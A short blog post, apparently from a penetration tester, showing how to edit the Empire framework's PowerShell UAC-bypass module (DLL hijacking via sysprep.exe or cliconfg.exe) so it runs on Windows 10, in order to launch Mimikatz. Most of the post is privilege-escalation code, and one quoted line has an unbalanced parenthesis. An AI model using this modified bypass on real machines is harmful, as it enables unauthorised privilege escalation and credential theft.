Using Empire in Kali 2.0 to bypass UAC and invoke Mimikatz on Win10

The guys on the Empire team have since added support for Windows 10, so this is no longer necessary.
So I was testing out Empire the other day on a Windows 10 box, but kept getting an error message when trying to bypass UAC on Windows 10:

So I took a look at the script that was running under /Empire/data/module_source/privesc/Invoke-BypassUAC.ps1 and found this:

$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})

if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) {
# windows 7/2008
$szElevDll = 'CRYPTBASE.dll'
$szElevDir = $env:WINDIR + "\System32\sysprep"
$szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep"
$szElevExeFull = "$szElevDir\sysprep.exe"
$szElevDllFull = "$szElevDir\$szElevDll"
$szTempDllPath = $TempPayloadPath
Write-Verbose "Windows 7/2008 detected"
}
elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3") {
# windows 8/2012
$szElevDll = 'NTWDBLIB.dll'
$szElevDir = $env:WINDIR + "\System32"
$szElevDirSysWow64 = ''
$szElevExeFull = "$szElevDir\cliconfg.exe"
$szElevDllFull = "$szElevDir\$szElevDll"
$szTempDllPath = $TempPayloadPath
Write-Verbose "Windows 8/2012 detected"
}
else {
"[!] Unsupported OS!"
throw("Unsupported OS!")
}

There it is, that dreaded “Unsupported OS!” error.  It looks like its doing a version check, but not specifically including Windows 10.  So lets change that:

$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})

if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) {
# windows 7/2008
$szElevDll = 'CRYPTBASE.dll'
$szElevDir = $env:WINDIR + "\System32\sysprep"
$szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep"
$szElevExeFull = "$szElevDir\sysprep.exe"
$szElevDllFull = "$szElevDir\$szElevDll"
$szTempDllPath = $TempPayloadPath
Write-Verbose "Windows 7/2008 detected"
}
elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3") -or ($OSVersion -eq "10.0")) {
# windows 8/2012/10
$szElevDll = 'NTWDBLIB.dll'
$szElevDir = $env:WINDIR + "\System32"
$szElevDirSysWow64 = ''
$szElevExeFull = "$szElevDir\cliconfg.exe"
$szElevDllFull = "$szElevDir\$szElevDll"
$szTempDllPath = $TempPayloadPath
Write-Verbose "Windows 8/2012 detected"
}
else {
"[!] Unsupported OS!"
throw("Unsupported OS!")
}

In the original code on line 555 it was looking specifically for Windows 8 or Server 2012.  In the modified version I added a check for Windows 10 as well.

After modifying and saving the code, I ran the command again, and this time it worked!
Here’s a video of me doing this start to finish.  As always, if you have any questions feel free to drop by #infoseclabs on freenode.

Video:
https://www.youtube.com/watch?v=Q5NOKJhU7TA&feature=youtu.be